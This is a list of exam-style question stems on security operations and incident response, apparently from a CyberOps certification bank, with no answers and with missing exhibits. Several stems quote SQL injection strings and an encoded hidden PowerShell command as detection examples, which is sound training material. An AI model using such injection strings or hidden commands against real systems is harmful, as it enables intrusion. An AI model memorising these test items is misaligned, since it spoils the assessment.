Easy397A security analyst is investigating a potential data breach. Which two actions are examples of passive reconnaissance? (Choose two.)
Medium398Which of the following are responsibilities of the legal counsel role during incident response? (Choose two.)
Medium399Which Windows Prefetch file extension indicates that a program has been executed on the system?
Easy400GreenTech Inc. is a mid-sized company with 500 employees. The company uses Microsoft Exchange Online for email and has implemented a security policy that requires all employees to report suspicious emails to the security team. The security team uses a phishing simulation tool to train employees. In the past month, several employees have reported receiving emails that appear to be from the CEO requesting urgent wire transfers. The security team has blocked the sender domains and updated the email filters. However, one employee fell for the latest scam and transferred $50,000 to an account before reporting it. The security incident response plan states that any monetary loss must be reported to the board within 24 hours. The security analyst receives the report on Monday morning. What should the analyst do first based on the policy and best practices?
Hard401An analyst is analyzing a Linux system that may have been compromised. Which THREE artifacts would provide evidence of attacker activity? (Choose three.)
Hard402An analyst is investigating a Windows host and observes a suspicious process with PID 1337. Which THREE of the following Volatility commands would provide useful information about this process? (Choose three.)
Hard403A security operations center (SOC) manager is developing a playbook for handling phishing incidents. The playbook must specify the first action an analyst should take upon receiving a reported phishing email. Which action should be performed first according to standard incident response procedures?
Hard404A company's web server is overwhelmed by traffic from multiple compromised systems, causing it to become unresponsive to legitimate users. Which type of attack is this?
Medium405An analyst is investigating a suspected SQL injection attack captured in a PCAP. The analyst needs to identify TWO indicators in the HTTP traffic that would confirm a SQL injection attempt. Which two indicators should the analyst look for? (Choose two.)
Hard406An analyst sees these logs. What should be the immediate course of action?
Hard407A security analyst is analyzing a suspicious PE file. Using a hex editor, the analyst sees the MZ header (4D 5A). The file's entropy is calculated as 7.8. What does the high entropy most likely indicate?
Hard408A security analyst is examining a Linux host and wants to identify which user account was used to execute a specific command that modified a critical system file. Which of the following files would provide the MOST direct evidence of the user who executed the command?
Easy409A SOC analyst at Tier 1 receives an alert for a known malware signature. After initial investigation, the analyst finds that the alert is a false positive caused by an outdated signature. What should the analyst do next?
Medium410A security team is reviewing the confidentiality, integrity, and availability (CIA) triad for a new file-sharing service. The service must ensure that data cannot be altered in transit by unauthorized parties. Which security principle is primarily addressed by implementing TLS for all connections?
Easy411An analyst notices periodic HTTP GET requests to a suspicious domain every 60 seconds. The payload size is small and consistent. This behavior is characteristic of which phase of the Cyber Kill Chain?
Medium412A SOC analyst notices an internal host transmitting a series of ICMP Echo Request packets to an external IP, each with a payload size of exactly 1024 bytes and a repeating pattern. The echo replies are consistently the same size. Which type of activity does this most likely indicate?
Medium413A security team is analyzing a malware infection. Which two characteristics are typical of a worm? (Choose two.)
Medium414Which THREE of the following are common Indicators of Compromise (IoCs) used in threat intelligence?
Easy415A security analyst needs to verify the authenticity and integrity of a software update. The update is signed with a digital signature. Which key is used to verify the signature?
Medium416A security analyst is reviewing the organization's incident response plan and notices that the 'Lessons Learned' phase is scheduled only after major incidents. The analyst recommends that this phase be conducted after all incidents, regardless of severity. What is the primary benefit of this recommendation?
Hard417An organization has implemented a security information and event management (SIEM) system. The SOC analyst receives an alert indicating a high number of failed login attempts from a single IP address targeting a critical server. The analyst checks the server logs and finds that the server is configured to lock the account after 5 failed attempts. However, the alert shows thousands of attempts. Which of the following explains this discrepancy?
Hard418A security administrator is implementing a privileged access management (PAM) solution. Which practice best enforces the principle of least privilege for administrators?
Medium419A company is updating its security policy to align with the principle of least privilege. The IT director asks the security analyst to recommend a control that enforces this principle for user access to a financial application. Which control should the analyst recommend?
Easy420A security analyst is reviewing a Windows host for indicators of credential dumping. The analyst wants to identify artifacts that commonly indicate tools such as Mimikatz have been used on the system. Which two artifacts should the analyst look for? (Choose two.)
Medium421An analyst monitoring an internal network observes a host sending a large number of TCP segments with the URG flag set and a non-zero urgent pointer, but the urgent pointer value does not point to actual urgent data. The destination host appears to be processing the data normally. Which explanation best describes what the analyst is observing?
Hard422A SOC analyst is analyzing NetFlow data and notices a sudden spike in outbound traffic from a single internal host to an external IP address during non-business hours. The traffic volume is significantly higher than the baseline. Which suspicion is most likely?
Hard423A Linux server has been compromised. The analyst checks for persistence mechanisms. Which THREE of the following are common Linux persistence techniques that should be examined? (Select THREE)
Hard424Which THREE are examples of social engineering attacks? (Select three.)
Medium425A security analyst is reviewing a packet capture and notices that a host is sending TCP segments with the SYN flag set to a range of ports on a single target, but the source IP address in each segment is spoofed to a different random address. The target replies with SYN-ACK packets to those spoofed addresses, and the host never completes the handshake. Which type of attack is this host performing?
Medium426A security analyst is reviewing a packet capture of traffic entering the corporate network. The analyst notices a large number of TCP SYN packets sent to multiple destination ports on a single internal host, with no corresponding ACK packets. The source IP addresses are spoofed and vary across each packet. Which type of attack is this traffic MOST likely associated with?
Medium427A security analyst at a medium-sized enterprise notices that an employee's workstation has been sending outbound traffic to a known malicious IP address at irregular intervals. The analyst runs a scan and finds no malware signatures. What should the analyst do next?
Medium428An analyst reviews IDS alerts and sees multiple alerts for the same signature from different internal IPs targeting the same external server. One common cause is...
Medium429A security analyst is reviewing a suspicious file found on a user's workstation. The file has a .docx extension but when the analyst inspects its header bytes, the file begins with the magic number for a Windows Portable Executable. The user reports the file arrived as an email attachment. Which type of malware delivery technique does this describe?
Easy430An analyst uses 'sc query' on a Windows host and finds a service named 'WindowsUpdate' with a binary path pointing to 'C:\Users\Public\update.exe'. The service is running. Why is this suspicious?
Medium431A security manager is developing a business continuity plan (BCP) and needs to determine the maximum tolerable downtime (MTD) for a critical order-processing system. The system generates $10,000 in revenue per hour. If the system is down for more than 4 hours, the company will lose a key customer. What is the MTD for this system?
Medium432An analyst is reviewing Windows Event Logs and sees multiple Event ID 4625 entries from a single IP address. What does this indicate?
Medium433A security analyst is investigating a Windows host and wants to view running processes along with their parent-child relationships and command-line arguments. Which tool is best suited for this task?
Easy434A security analyst is reviewing a Snort alert that triggered on the signature 'ET TROJAN Win.Trojan.Generic'. What is the most likely reason this alert fired?
Easy435A healthcare organization has a security policy that mandates immediate reporting of any potential data breach to the privacy officer. An analyst notices that an employee accidentally emailed a patient list to the wrong recipient. The recipient is known to be a trusted partner, but the email contained PHI. The analyst contacts the recipient who acknowledges receipt and agrees to delete the email. What should the analyst do next?
Easy436Which encryption method uses a single key for both encryption and decryption of data?
Medium437A SOC analyst needs to create a SIEM correlation rule to detect a brute force attack against SSH on a server. Which of the following would be the most effective rule logic?
Easy438Match each Cisco CyberOps concept to its description.
Medium439An analyst inspects a PCAP and sees an internal host sending HTTP requests where the User-Agent string is unusually long and contains random alphanumeric characters, and the Cookie header carries base64-like data to an external server. The server responds with small HTTP 200 OK messages. Which technique is most consistent with this traffic?
Hard440A security analyst is reviewing logs from a web server and notices a high volume of HTTP requests from a single IP address targeting the same login page within a short time frame. The analyst suspects a brute force attack. Which TWO actions are most appropriate to mitigate this type of attack? (Choose two.)
Medium441A security analyst is collecting evidence from a compromised system for legal proceedings. Which TWO actions are critical to preserve the integrity of the evidence?
Medium442An organization classifies data into Public, Internal, Confidential, and Restricted tiers. A developer needs to place a dataset containing customer payment card numbers into the correct tier and apply the required handling controls. According to common data classification practices, which tier and control combination is most appropriate?
Medium443A SOC analyst notices that a workstation is generating NetFlow records showing repeated outbound connections to 203.0.113.45 on port 443 at regular 60-second intervals, with each flow transferring approximately 4 KB. The destination IP has no reputation data. Which analysis approach would best determine whether this traffic represents C2 beaconing?
Medium444While analyzing a PCAP, an analyst uses the Wireshark filter 'http.request' and finds a URI parameter containing '%27%20UNION%20SELECT%201,2,3%20--'. What type of attack is indicated?
Medium445A SOC analyst is investigating a suspicious file on a Windows host. The file hash matches a known malware variant in a threat intelligence feed. What is the next best step for host-based analysis?
Easy446Which type of malware is designed to replicate itself and spread to other systems without user intervention?
Medium447Which principle ensures that a user cannot deny having performed an action?
Easy448A network analyst is examining a PCAP and sees a large number of ICMP echo request packets sent from a single internal host to multiple external IP addresses, with varying payload sizes and no corresponding echo replies. The analyst suspects the host is being used for reconnaissance or data exfiltration. Which characteristic of the ICMP traffic would most strongly indicate that it is being used for data exfiltration rather than simple reconnaissance?
Easy449Based on the exhibit, which type of traffic is being denied?
Easy450An analyst needs to review the Windows event logs from a host to determine if a user's account was used to log in at an unusual time. Which log type should the analyst check?
Easy451A security policy mandates that all network devices must be hardened. Which THREE of the following are common hardening best practices for routers and switches? (Select three.)
Hard452An analyst is tuning a Cisco Firepower intrusion policy. A rule fires repeatedly with the message 'MALWARE-CNC Outbound connection to known malicious domain' against a marketing workstation. Packet capture shows the workstation resolving and connecting to a domain that the threat intelligence feed lists, but the endpoint shows no malicious process, no persistence, and the user states they clicked a link in a phishing email an hour earlier. Which action best reflects sound incident handling at this stage?
Hard453A Security Operations Center (SOC) uses Security Information and Event Management (SIEM) with event correlation. Analysts notice that alerts for a specific malware signature have decreased sharply after a new firewall rule was deployed. However, endpoint scans still show infections on several hosts. What is the most likely explanation for the decrease in SIEM alerts?
Hard454Which TWO of the following are key elements that should be included in an incident response plan?
Easy455A security analyst at a mid-sized company is reviewing the organization's risk management strategy. The CIO asks the analyst to describe the primary purpose of a vulnerability assessment. Which statement best describes this purpose?
Easy456During an incident response engagement, an analyst is examining a Windows Server 2019 host that is suspected of being compromised. The analyst wants to determine which user accounts were used to log on interactively to the console in the last 24 hours. Which Windows artifact should the analyst query to obtain this information?
Hard457You are a security analyst at a financial institution. The network consists of a traditional perimeter firewall, an internal IDS (Snort), and a separate network monitoring tool that captures full packet data. Recently, the bank experienced a breach where an attacker exfiltrated customer data via DNS tunneling. The attack went undetected for weeks. The CISO wants to improve detection of data exfiltration and has tasked you with proposing a new monitoring strategy. The current IDS has signatures for common malware C2 channels but no specific DNS tunneling rules. You have access to the full packet capture archive. Which approach would be most effective in detecting DNS tunneling while minimizing false positives?
Hard458A security analyst discovers that an attacker is using a vulnerability scanning tool to identify open ports on the company's network. Which type of attack is being performed?
Easy459Which threat intelligence sharing standard defines a language and format for representing structured threat information, such as indicators and campaigns?
Medium460Which NIST Cybersecurity Framework function involves developing and implementing appropriate safeguards to ensure delivery of critical infrastructure services?
Easy461A security analyst is reviewing the firewall log exhibit. The analyst suspects that this traffic might be part of a command-and-control (C2) communication based on the packet size and the timing of similar events. Which TWO additional pieces of evidence would most strongly support the suspicion of C2 traffic?
Hard462An attacker intercepts communication between a client and server and modifies the data being transmitted. The client and server are unaware of the modification. Which type of attack is being performed?
Hard463During an investigation, an analyst finds that an internal host has been communicating with a known malicious IP on port 445. Which protocol is most likely involved?
Medium464A system administrator needs to grant access to a database for a new employee. According to the principle of least privilege, what should be done?
Medium465A company uses a SIEM with correlation rules. They notice that a rule designed to detect brute-force attacks is not triggering even though failed logins are occurring. Which is the most likely cause?
Medium466A security analyst is reviewing the access control strategy for a research and development department. The department handles highly sensitive intellectual property, and the organization wants to ensure that employees can only access information strictly necessary for their current project tasks, even if they have previously worked on other projects. Which access control principle is being enforced?
Medium467Your organization recently deployed a new web application that uses HTTPS. The security team notices that the IDS is generating a large number of alerts for 'SSL/TLS handshake anomalies' and 'self-signed certificates'. After investigating, you find that many of these alerts are coming from a legitimate internal scanning tool that uses a self-signed certificate. The IDS also reports a high rate of 'TLS renegotiation' attempts from the same source. The CISO wants to reduce false positives while maintaining visibility. The IDS is based on Suricata and uses a default rule set. What is the best course of action?
Medium468A security policy requires that all remote access be authenticated using a one-time password (OTP) token. Which technology should be implemented?
Medium469A security analyst is reviewing a packet capture and observes that a workstation is sending a large volume of TCP SYN packets to many different destination IP addresses on port 445, with no corresponding completed handshakes. The analyst suspects malware is performing reconnaissance. Which type of activity is this workstation most likely performing?
Medium470An analyst is investigating a Windows 10 workstation suspected of being compromised. The analyst runs `wmic process get name,processid,parentprocessid,commandline` and observes a process named `powershell.exe` with the command line `powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAA...`. What does the `-enc` parameter indicate about how the command was executed?
Medium471A financial services company must retain security event logs for a period defined by its policy and applicable regulations. The security architect is documenting how long different log sources must be kept and where. Which statement best reflects a sound log retention practice for security operations?
Medium472Based on the exhibit, what condition triggers an alert?
Hard473Which element of the CIA triad is primarily compromised when an attacker successfully intercepts and reads encrypted network traffic without authorization?
Easy474A critical security patch for a widely exploited vulnerability is released. The patch requires a system reboot during business hours. According to change management policy, what is the best procedure?
Medium475An analyst is investigating a potential data exfiltration. The logs show a series of DNS queries with subdomains that appear to be base64-encoded strings. Which technique is likely being used?
Hard476An analyst runs Volatility's pstree plugin on a memory dump. The output shows that a process 'svchost.exe' is the child of 'explorer.exe'. What is suspicious about this?
Medium477A company's incident response policy defines four phases: Preparation, Detection & Analysis, Containment Eradication & Recovery, and Post-Incident Activity. During an active ransomware outbreak, the IR team is unable to contain the spread because the containment plan did not account for the malware's use of PowerShell for lateral movement. Which phase had a deficiency?
Medium478A security analyst is reviewing the chain of custody form for a laptop seized from an employee suspected of intellectual property theft. The form shows the laptop was collected by the IT manager, transported to a storage room, and later examined by an outside forensics firm. The analyst notices that the form lacks signatures for the transfer between the IT manager and the storage room custodian. What is the most likely impact of this omission on the investigation?
Medium479A security analyst is reviewing network traffic and observes a large number of DNS queries for randomly generated domain names, such as 'a1b2c3d4e5f6g7h8.com', from a single internal host. The queries are followed by responses with very short TTL values. The analyst suspects the host is compromised. Which type of malicious activity is most likely occurring?
Medium480A SOC analyst sees an alert for 'Possible SQL Injection' on a web server. Reviewing the PCAP, the analyst finds the parameter 'id=1 OR 1=1' in the HTTP request. However, the web server returns a normal page with no signs of compromise. What is the correct classification?
Medium481Which cryptographic technique uses a public and private key pair to provide non-repudiation?
Medium482Which THREE are principles of the CIA triad? (Select three.)
Hard483An attacker intercepts communication between two parties and modifies the data before forwarding it. Which type of attack is this?
Medium484A forensic analyst uses Volatility on a memory dump and runs the 'malfind' plugin. The output shows a process with a VAD region that has PAGE_EXECUTE_READWRITE protection and contains the pattern 'MZ'. What does this indicate?
Hard485A security analyst needs to ensure data integrity. Which control best achieves this?
Easy486According to the principles of least privilege, which THREE of the following access controls should be implemented for a typical user account? (Choose three.)
Hard487A SOC analyst is reviewing a Windows 10 endpoint after a suspected compromise. They need to determine which user account was responsible for a specific process that was launched shortly before the alert. Which Windows artifact directly records the user account associated with process creation events and should be queried using Windows Event Log?
Medium488A healthcare organization stores patient records and must comply with the HIPAA Security Rule. The CISO wants to document the types of safeguards that protect data through encryption, access controls, and audit logging. Which category of safeguards under the HIPAA Security Rule covers these controls?
Easy489A SOC analyst receives an alert about a Windows workstation that may be infected with malware. The analyst wants to examine the system's boot configuration to determine if the malware modified boot settings to disable driver signature enforcement. Which Windows tool should the analyst use to view the current boot configuration data?
Medium490An analyst discovers that an employee has been using company-issued laptops to run a personal cryptocurrency mining software. Which policy violation has occurred?
Medium491A security analyst is analyzing a memory dump from a compromised Windows system using Volatility. Which command would best reveal hidden or injected code within a process?
Hard492Which OSI layer is associated with protocols such as HTTP, FTP, and SMTP, and is commonly targeted by application-layer attacks?
Easy493Which Windows Event ID corresponds to a successful user logon?
Easy494A security analyst is reviewing a Windows 10 endpoint that is suspected of being compromised. The analyst opens Task Manager and notices a process named 'lsass.exe' running with a PID of 1234, but its parent process is 'cmd.exe' rather than 'wininit.exe'. The analyst also observes that the process path is 'C:\Users\Public\lsass.exe'. Which type of attack is most likely indicated by these findings?
Medium495An analyst examines a PCAP and observes that an internal host sends an ICMP echo request containing a payload of 1200 bytes, followed by an ICMP echo reply from an external host with a payload of 1500 bytes. The payload data does not match standard ping patterns and appears to contain encoded file fragments. Which technique is most consistent with this observation?
Hard496A SOC analyst is analyzing a PCAP from a suspected intrusion. The traffic shows a series of TCP connections where the client sends a SYN, receives a SYN-ACK, then immediately sends a RST instead of an ACK, and this pattern repeats across multiple ports on the same target. Which type of scan is most likely being performed?
Medium497An IDS generates an alert for a signature that matches HTTP traffic containing 'cmd.exe' in the URI. The analyst checks the packet and sees the URI is actually 'cmd.exe?help'. What should the analyst do?
Easy498A vendor security policy requires that all third-party remote access be limited to specific IP addresses and use multi-factor authentication. During an audit, it is discovered that a vendor's entire office subnet is allowed instead of individual IPs. The vendor argues that the broader range is necessary for redundancy. What is the best way to handle this from a policy perspective?
Hard499Which THREE types of network traffic anomalies are strong indicators of a data exfiltration attempt?
Hard500An intrusion detection system alerts on HTTP traffic containing the string 'UNION SELECT' in the URI parameter. This is most indicative of what type of attack?
Hard501An organization uses Windows 10 Enterprise workstations with standard user accounts (no local admin). Users run daily tasks including web browsing, document editing, and accessing a corporate intranet. Recently, the security team detected anomalous outbound traffic from one workstation to an IP address in a foreign country. The workstation's host-based firewall shows that a process named 'svch0st.exe' initiated the connection. Additionally, a scheduled task named 'UpdateTask' runs every hour with SYSTEM privileges, executing a script from a hidden folder. The user reports no unusual behavior except occasional system slowdowns. The analyst must determine the best immediate course of action. Which action should the analyst take first?
Medium502Which TWO are examples of risk treatment options? (Select two.)
Easy503A company's web server is overwhelmed with traffic from many compromised devices, causing legitimate users to be unable to access the site. What type of attack is this?
Medium504A user receives an email that appears to be from their bank, asking them to click a link and verify their account details. The email contains a sense of urgency. Which type of attack is this?
Medium505Match each Linux command to its function.
Medium506An analyst uses Volatility's 'netscan' on a memory dump and finds an established connection to an external IP on port 4444. Which type of activity is this commonly associated with?
Medium507A security analyst notices repeated failed login attempts from a single IP address to the company's VPN gateway. Which action should the analyst take first?
Easy508A PCAP contains an HTTP POST request with a parameter containing "UNION SELECT username, password FROM users". This is evidence of:
Medium509Refer to the exhibit. An analyst examines the port security status on a switch interface. What action should the analyst take to restore connectivity to the device connected to this port?
Medium510A network analyst is examining a PCAP and notices a series of TCP packets with the PSH flag set and small payload sizes, sent from an internal host to an external IP. The external IP responds with similar small packets. The communication is continuous and occurs at regular intervals. Which type of activity is most likely occurring?
Medium511A SOC analyst receives an alert for 'Malware Detected' from an endpoint sensor. The analyst checks the endpoint and sees a file named 'invoice.exe' in the Downloads folder. What should the analyst do first?
Easy512A junior analyst is asked to identify which type of log would best show whether a Windows workstation attempted to authenticate to a file share on another server. Which log source should the analyst consult?
Easy513An analyst uses Wireshark to examine network traffic and wants to see only packets that contain the string 'password'. Which type of filter should be applied?
Medium514An analyst is reviewing a suspicious email reported by a user. The email contains an attachment 'invoice.pdf' and urges the user to open it. Which indicator is most likely to confirm it is a phishing attempt?
Easy515An analyst reviews PCAP traffic and sees a series of HTTP POST requests from an internal host to an external IP at exactly 60-second intervals. The payload size is consistent. Which phase of the Cyber Kill Chain does this activity most likely represent?
Medium516A security analyst is examining a suspicious executable found on a compromised host. Static analysis reveals that the file contains a packer and obfuscated strings. When run in a sandbox, it attempts to connect to an external IP address and modifies registry keys for persistence. Which stage of the cyber kill chain does the registry modification represent?
Medium517A SIEM correlation rule triggers when more than 10 failed login attempts from a single source IP occur within 1 minute. This rule is designed to detect:
Medium518A SOC analyst is reviewing a NetFlow record and sees that a single internal IP has communicated with multiple external IPs on port 445 (SMB) within a short time frame. Which type of activity is most likely indicated?
Hard519An analyst reviews an IDS alert indicating a TCP SYN scan against a web server. The analyst wants to confirm the scan by examining packet-level evidence in the PCAP. Which TWO characteristics would confirm a SYN scan rather than legitimate client behavior? (Choose two.)
Medium520An organization uses Cisco AMP for Endpoints. A file with a low prevalence score is executed on multiple endpoints, and AMP identifies it as malicious after behavioral analysis. The analyst needs to ensure that all endpoints are protected from this file. Which action should be taken?
Hard521A network security analyst is reviewing NetFlow records from a perimeter router and observes that an internal server at 172.16.5.20 has transferred approximately 4.5 GB to an external IP address in country X over the past three hours, all during non-business hours. The destination IP has no prior communication history with the organization and the traffic uses port 443. Which analysis approach would best confirm whether this represents data exfiltration?
Medium522An analyst is reviewing a PCAP and sees multiple HTTP requests with the parameter 'id=1 UNION SELECT username,password FROM users'. What type of attack is being attempted?
Medium523A security administrator is reviewing the company's incident response plan and wants to ensure that the team understands the difference between a vulnerability, a threat, and a risk. During a tabletop exercise, the administrator presents a scenario: a web server has an unpatched Apache Struts vulnerability, and a known exploit exists publicly. Which term best describes the unpatched Apache Struts vulnerability in this context?
Easy524Drag and drop the steps for the DHCP DORA process (dynamic host configuration) into the correct order.
Medium525Which THREE of the following are common types of security policies that organizations typically implement?
Medium526An analyst is investigating a malware infection on a workstation. The malware appears to be a trojan that downloads additional payloads and allows remote control. The analyst needs to classify the malware based on its behavior. Which THREE characteristics match this description? (Choose three.)
Hard527A security analyst is reviewing logs and notices that an attacker has intercepted and modified communications between two devices without their knowledge. Which type of attack is this?
Medium528A security manager is drafting an incident response policy and wants to ensure that the organization can legally monitor employee communications during an investigation. The manager asks the legal team what element must be included in the employee handbook and policy documents to support this capability. Which element is most critical?
Medium529A company processes credit card payments and must comply with a framework that mandates specific security controls for protecting cardholder data. Which compliance framework applies?
Hard530An security auditor finds that the company's backup policy does not include offsite storage. The security policy requires that backups be stored in a geographically separate location. What should the company do?
Medium531A security analyst is investigating a Linux server that is suspected of hosting a reverse-shell backdoor. The analyst wants to identify which running process is maintaining the outbound connection and which user context it is running under. Which TWO commands would best provide this information? (Choose two.)
Medium532A security analyst discovers that an attacker exfiltrated data using DNS tunneling. Which TWO controls should be implemented to detect or prevent this? (Select two.)
Hard533During incident response, an analyst extracts files from a PCAP using Wireshark's Export Objects feature. One extracted file is a PDF that triggers an IDS alert for 'Exploit:PDF/HeapSpray'. Which technique does this alert describe?
Hard534A SOC analyst is reviewing NetFlow records exported from the border router. A single internal workstation is generating a steady stream of outbound sessions to dozens of unique external IP addresses on TCP port 443, each lasting only a few seconds, every day at 02:00. No corresponding firewall denies are logged. Which security monitoring conclusion is most appropriate?
Medium535A security analyst discovers that a former employee's user account remains active 45 days after termination, and audit logs show that the account was used to access a file server twice in the past week. Which element of the access control lifecycle was MOST directly violated?
Medium536A security analyst observes periodic outbound HTTPS connections to an unusual domain that resolves to different IP addresses each time. This behavior is most indicative of:
Medium537You are the cybersecurity analyst for a small business that has a security policy requiring all network traffic to pass through a proxy server for content filtering. Recently, employees have been complaining that some websites are not loading correctly. You check the proxy logs and see that the proxy is blocking traffic that appears to be from non-standard ports. However, upon investigation, you find that the blocked sites are legitimate business tools that use custom ports. Which action aligns with the security policy?
Medium538An analyst is reviewing a Linux host that is suspected of being compromised. The analyst runs 'ls -l /proc/1234/exe' and sees that the symbolic link points to '/tmp/.hidden/backdoor'. The process with PID 1234 is owned by root and was started from an unknown parent process. Which of the following best describes what the analyst has discovered?
Medium539A company uses a SIEM that collects logs from firewalls, servers, and endpoints. The SIEM is generating a high volume of low-priority events, causing analysts to miss critical alerts. Which approach would best improve the signal-to-noise ratio?
Hard540A security analyst is reviewing logs from a network-based IPS that detected traffic from an internal host connecting to a known malicious IP address on port 6667. The traffic is encrypted IRC. Which conclusion is most likely?
Medium541A security analyst suspects that a Windows workstation was compromised by malware that schedules a recurring task to maintain persistence. The analyst opens Task Scheduler and sees dozens of scheduled tasks. Which built-in command-line utility should the analyst use to export a detailed list of all scheduled tasks, including the actions they perform, so the list can be reviewed offline?
Medium542A Cisco Firepower sensor is generating an alert for a known benign application. The analyst has verified it is a false positive. What is the first step to suppress this alert?
Medium543An analyst reviews Snort alert logs and sees many alerts for 'SQL Injection Attempt' from a single external IP to a public-facing web server. Which analysis step is most effective?
Medium544A security analyst is investigating a potential exploit. The PCAP shows a HTTP POST request containing a long string of characters that, when decoded, reveals a series of return-oriented programming (ROP) gadgets. What is the likely purpose of this payload?
Hard545An analyst is investigating an alert for a potential ICMP tunneling attack. The analyst reviews a PCAP and notices a series of ICMP Echo Request packets with unusually large payloads (over 1000 bytes) and varying payload contents, sent from an internal host to an external IP address. The external host replies with ICMP Echo Reply packets of similar size. Which characteristic most strongly supports the conclusion that this is ICMP tunneling rather than normal ping traffic?
Medium546Which two characteristics are commonly associated with a distributed denial-of-service (DDoS) attack?
Medium547Which compliance framework is specifically designed to protect the privacy and security of electronic health information in the United States?
Medium548A security analyst is reviewing logs from a web proxy and sees that a user's machine is making frequent connections to a domain that is registered recently and has a low reputation score. What is the best action?
Medium549A company wants to protect its web application from injection attacks by ensuring that user-supplied input is not interpreted as code by the backend database. Which control should be implemented?
Medium550Which TWO actions should an analyst take when a critical alert is triggered?
Easy551Which of the following is a common indicator of a brute-force attack on an SSH server?
Easy552Which type of malware is characterized by self-replication and spreading to other systems without user interaction, often causing network congestion?
Medium553An analyst detects an attack where the attacker uses NTLM authentication with a hashed password instead of the plaintext password. This technique is known as:
Hard554A threat hunter reviews Cisco Umbrella DNS logs and notices repeated queries for randomly generated subdomains under a single parent domain, each resolved by a different authoritative name server. The hunter suspects DNS tunneling. Which additional artifact would most directly confirm command-and-control activity rather than legitimate DNS behavior?
Hard555A SOC analyst is analyzing logs from multiple sources. Which THREE log types are most useful for detecting a brute force attack against a web application?
Hard556A security analyst at a SOC Tier 1 receives an alert about a potential malware infection on a user's workstation. What is the primary responsibility of the Tier 1 analyst in this scenario?
Medium557A security analyst is using a SIEM to create a correlation rule that triggers when more than 10 failed logins are detected from the same source IP within 1 minute. This rule is designed to detect which type of attack?
Easy558An organization uses Zeek for network monitoring. An analyst wants to extract files transferred over HTTP from network traffic. Which Zeek script or functionality should they use?
Hard559Which of the following is a valid indicator of compromise (IoC)?
Easy560During a threat hunt, an analyst discovers sustained outbound traffic from a workstation to multiple IP addresses in different countries on port 443. The traffic patterns show periodic spikes at 5-minute intervals. The workstation is used by a sales representative who frequently accesses cloud CRM. Which additional evidence would most strongly suggest the workstation is compromised?
Hard561What is the purpose of a security baseline?
Easy562Which THREE of the following are common evasion techniques used by attackers?
Hard563During the containment phase of an incident, the IR team decides to power off a compromised server to prevent further damage. However, they later realize that this action may have destroyed volatile evidence. According to best practices, what should the team have done instead?
Hard564A security analyst is investigating a potential data exfiltration incident. Which TWO of the following are common indicators that data exfiltration may be occurring over DNS? (Choose two.)
Medium565A security analyst is configuring a firewall to block common reconnaissance techniques. Which THREE types of reconnaissance traffic should be blocked to prevent active reconnaissance? (Choose three.)
Medium566A SOC analyst is reviewing a PCAP captured at the network perimeter. The analyst notices that a single internal host sends a series of ICMP echo requests to multiple external hosts, but the ICMP payload size is unusually large (over 1000 bytes) and the payload contains non-ASCII, high-entropy data. The echo replies from the external hosts are also large and contain similar data. Which type of activity is most likely occurring?
Medium567Refer to the exhibit. An analyst sees these log messages on a Cisco router. The source IP 10.0.0.2 is an internal server. What is the most likely explanation?
Hard568A security analyst is examining a suspicious executable and wants to extract readable strings to identify potential C2 domains or file paths. The analyst has the file on a Windows workstation and needs to use a built-in or commonly available tool. Which approach is most appropriate?
Medium569Which THREE of the following are indicators that a network may be compromised by a botnet?
Hard570A security analyst is creating a policy for handling sensitive customer data. The policy must ensure data is encrypted at rest and in transit. Which type of policy most directly addresses this requirement?
Medium571An organization's security policy requires that all data at rest on laptops be encrypted. An employee reports that their laptop was stolen. Which control would most likely prevent data exposure?
Easy572A security analyst is reviewing a suspicious file recovered from a compromised endpoint. The file contains a macro that, when opened, launches PowerShell to download a second-stage payload from a remote server. The analyst wants to classify this file based on its behavior. Which classification is most accurate?
Hard573A company is implementing a security policy that requires all employees to use multi-factor authentication (MFA) when accessing corporate resources remotely. However, during a recent security audit, it was found that several employees have been using app passwords for legacy applications that do not support MFA. What is the best practice under this policy?
Hard574A security analyst is reviewing an incident response policy that requires the team to preserve evidence for potential legal action. The analyst notices that the policy does not address how to handle evidence when a compromised system must be rebooted to restore services. What should the analyst recommend to balance evidence preservation with operational recovery?
Hard575A SOC analyst is reviewing Cisco Firepower intrusion event logs and notices a signature that fired with the message 'OS-COMMAND' on traffic destined to an internal web server on TCP port 80. Which type of activity does this signature most likely indicate?
Easy576A SOC analyst is monitoring network traffic using Cisco Stealthwatch. An alert is generated indicating a large volume of data being transferred from a critical server to an external IP address during off-hours. The analyst observes that the data transfer is using encrypted HTTPS traffic to a cloud storage provider. The server is known to host sensitive customer data. The analyst reviews the server's outbound firewall rules and finds that HTTPS traffic to any destination is allowed. The analyst checks the server's recent login logs and sees an authentication from a user account that is typically used by a contractor who only works during business hours. The contractor's account has not been disabled after the contract ended last week. What should the analyst do first?
Medium577A network analyst is troubleshooting a false positive alert from an IPS that blocks traffic to a legitimate database server. The alert signature is triggered by the pattern 'OR 1=1'. The analyst determines that the traffic is from a web application that uses dynamic SQL queries. Which action best reduces false positives while maintaining security?
Medium578During incident response, an analyst is collecting volatile evidence from a compromised Linux server that is still running. The team wants to preserve the current state of active network connections and running processes before any remediation. Which action best preserves this volatile data in a forensically sound manner?
Hard579A security analyst is investigating a potential data breach. The analyst identifies that the attacker used a technique to impersonate a legitimate user by spoofing the MAC address and IP address. Which TWO types of network attacks could involve these techniques? (Choose two.)
Medium580In a Linux system, an analyst wants to check for unauthorized cron jobs. Which of the following is a common location for user-specific cron jobs?
Medium581An organization uses STIX and TAXII to share threat intelligence with an ISAC. What is the purpose of TAXII in this scenario?
Medium582A security analyst is evaluating risks and calculates that a threat has a likelihood of 0.5 and an impact of $200,000. What is the risk value?
Hard583An analyst finds an unknown scheduled task on a Windows system that runs a PowerShell script at system startup. Which tool is best for examining the task's trigger and actions?
Medium584An analyst is examining a PCAP of what appears to be a covert channel. The analyst observes that the internal host sends ICMP Echo Requests that contain a payload of exactly 48 bytes of non-repeating binary data, and the corresponding Echo Replies always return with a zero-length payload. The payload bytes, when decoded, contain what looks like command strings. Which technique is most consistent with these observations?
Hard585An analyst uses 'tshark -r capture.pcap -Y "http.request.method == POST"' to display only HTTP POST requests. This is an example of a:
Hard586Refer to the exhibit. What does this packet capture indicate?
Hard587In a PCAP, an analyst sees a large outbound data transfer over FTP to an external IP address during non-business hours. The source host is a database server. Which phase of the Cyber Kill Chain does this represent?
Medium588Drag and drop the steps to configure a Cisco ASA firewall for basic network access into the correct order.
